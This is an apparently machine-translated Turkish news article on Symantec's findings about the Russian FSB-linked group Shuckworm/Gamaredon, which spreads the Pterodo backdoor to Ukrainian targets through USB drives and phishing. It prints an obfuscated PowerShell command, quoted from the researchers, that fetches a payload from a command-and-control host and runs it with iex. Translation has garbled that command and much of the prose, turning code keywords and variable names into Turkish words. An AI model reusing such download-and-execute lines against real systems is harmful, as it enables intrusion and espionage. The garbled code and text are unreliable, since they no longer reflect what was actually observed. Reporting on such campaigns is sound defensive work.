Pazartesi, Haziran 24, 2024
Ana SayfaTeknoloji HaberleriRusya destekli bilgisayar korsanları, Ukrayna ordusuna yeni USB tabanlı kötü amaçlı yazılım...

Rusya destekli bilgisayar korsanları, Ukrayna ordusuna yeni USB tabanlı kötü amaçlı yazılım saldı

Rusya destekli bilgisayar korsanları, Ukrayna ordusuna yeni USB tabanlı kötü amaçlı yazılım saldı

Getty Resimleri

Araştırmacılar, Rusya Federal Güvenlik Servisi için çalışan bilgisayar korsanlarının, küçük komşusunu devam eden işgalinde kullanmak üzere Ukraynalı hedeflerden büyük miktarda veri çalmak için USB tabanlı kötü amaçlı yazılım kullanan çok sayıda siber saldırı düzenlediğini söyledi.

Şu anda Broadcom’a ait olan Symantec’ten araştırmacılar Perşembe günkü bir gönderide, “Hedeflenen kuruluşların ve makinelerin sektörleri ve doğası, saldırganların önemli miktarda hassas bilgiye erişmesini sağlamış olabilir.” “Bazı kuruluşlarda, saldırganların kuruluşun insan kaynakları departmanlarının makinelerinde olduğuna dair göstergeler vardı, bu da çeşitli kuruluşlarda çalışan kişiler hakkındaki bilgilerin saldırganlar için diğer şeylerin yanı sıra bir öncelik olduğunu gösteriyor.”

Symantec’in Shuckworm ve diğer araştırmacıların Gamaredon ve Armageddon olarak adlandırdığı grup, 2014’ten beri faaliyet gösteriyor ve o ülkedeki başlıca güvenlik servisi olan Rusya’nın FSB’si ile bağlantılı. Grup, yalnızca Ukrayna hedefleri hakkında istihbarat elde etmeye odaklanıyor. 2020’de güvenlik firması SentinelOne’daki araştırmacılar, bilgisayar korsanlığı grubunun “Ukrayna genelinde 5.000’den fazla bireysel varlığa, özellikle de Ukrayna birliklerinin konuşlandırıldığı alanlara odaklanarak saldırdığını” söyledi.

Şubat ayında Shuckworm, o ülkenin ordusunda, güvenlik hizmetlerinde ve hükümetinde çok sayıda Ukrayna örgütünün savunmasına başarıyla giren yeni kötü amaçlı yazılım ve komuta ve kontrol altyapısını dağıtmaya başladı. Grup üyeleri, Rusya’nın devam eden işgalinde kötüye kullanılabilecek hassas askeri bilgilerle ilgili bilgileri elde etmekle en çok ilgileniyor gibi görünüyor.

Bu daha yeni kampanya, Shuckworm tarafından oluşturulan bir arka kapı olan Pterodo’yu yayan bir PowerShell betiği biçimindeki yeni kötü amaçlı yazılımı piyasaya sürdü. Komut dosyası, virüslü USB sürücüleri hedeflenen bilgisayarlara bağlandığında etkinleşir. Kötü amaçlı komut dosyası önce kendisini hedeflenen makineye kopyalayarak rtf.lnk uzantılı bir kısayol dosyası oluşturur. Dosyaların video_porn.rtf.lnk, do_not_delete.rtf.lnk ve deli.rtf.lnk gibi adları vardır. Çoğunlukla Ukrayna dilinde olan isimler, hedefleri dosyaları açmaya ikna etme girişimidir, böylece makinelere Pterodo kuracaklardır.

Komut dosyası, hedeflenen bilgisayara bağlı tüm sürücüleri numaralandırmak ve kendisini tüm bağlı çıkarılabilir sürücülere kopyalamak için devam eder; büyük olasılıkla, kasıtlı olarak İnternet’e bağlı olmayan herhangi bir hava boşluklu cihaza bulaşmasını engellemek amacıyla bulaşma umuduyla. hackleniyor

Shuckworm izlerini örtmek için düzinelerce varyant yarattı ve komuta ve kontrol için kullandığı IP adreslerini ve altyapıyı hızla değiştirdi. Grup ayrıca, tespit edilmekten kaçınmak için başka bir girişimde komuta ve kontrol için Telegram ve mikro blog platformu Telegraph gibi meşru hizmetleri kullanıyor.

Shuckworm tipik olarak kimlik avı e-postalarını hedeflerin bilgisayarlarına ilk vektör olarak kullanır. E-postalar, .docx, .rar, .sfx, lnk ve hta gibi uzantıları olan dosyalar gibi görünen kötü amaçlı ekler içerir. E-postalar genellikle silahlı çatışmalar, cezai kovuşturmalar, suçla mücadele ve çocukları koruma gibi konuları, e-postaları açacak ve ekleri tıklatacak hedeflere ulaşmak için yem olarak kullanır.

Symantec araştırmacıları, kampanyada kurtardıkları virüslü bir bilgisayarın çalışma şekli açısından tipik olduğunu söyledi. Yazdılar:

Bir kurbanda, kötü amaçlı etkinliğin ilk işareti, kullanıcının büyük ihtimalle hedef odaklı kimlik avı e-postası yoluyla teslim edilmiş ve kötü amaçlı bir Belge içeren bir RAR arşiv dosyasını açtığı zamandı.

Belge açıldıktan sonra, saldırganların C&C sunucusundan bir sonraki aşama yükünü indirmek için kötü amaçlı bir PowerShell komutunun yürütüldüğü gözlemlendi:

“CSIDL_SYSTEMcmd.exe” /c başlangıç ​​/dak “” powershell -w gizli
“$gt=”/get.”+[char](56+56)+[char](104)+[char](112);$ev sahibi=[char](50+4
8);[system.net.servicepointmanager]::servercertificatevalidationcallb
ack={$true};$hosta+=’.vafikgo.’;$hosta+=[char](57+57);$ev sahibi+=[char](
60+57);$adres=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.ad
kıyafet listesi[0];$client=(yeni nesne
net.webclient);$faddr=”htt”+’ps://’+$addr+$gt;$text=$client.downloads
tring($faddr);iex $metin”

Daha yakın zamanlarda Symantec, Shuckworm’un PowerShell betiklerinde daha fazla IP adresinden yararlandığını gözlemledi. Bu muhtemelen araştırmacılar tarafından kullanılan bazı izleme yöntemlerinden kaçınma girişimidir.

Shuckworm ayrıca, Ocak ve Nisan 2023 arasında her ay gözlemlenen grubun komut dosyalarının 25 adede kadar yeni varyantıyla, tespit edilmekten kaçınmak amacıyla PowerShell betiklerinde kullanılan gizleme tekniklerini güncellemeye devam ediyor.

Perşembe günkü gönderi, insanların hedef alınıp alınmadığını tespit etmek için kullanabilecekleri IP adreslerini, karmaları, dosya adlarını ve diğer uzlaşma göstergelerini içerir. Gönderi ayrıca grubun, hedeflerin ciddiye alması gereken bir tehdit oluşturduğu konusunda da uyarıda bulunuyor.

“Bu faaliyet, Shuckworm’un Ukrayna’ya acımasızca odaklanmasının devam ettiğini gösteriyor” diye yazdılar. “Rus ulus-devlet destekli saldırı gruplarının, askeri operasyonlarına potansiyel olarak yardımcı olabilecek verileri bulma girişimlerinde Ukrayna hedeflerine lazerle saldırmaya devam ettiği açık görünüyor.”

RELATED ARTICLES

Popüler Konular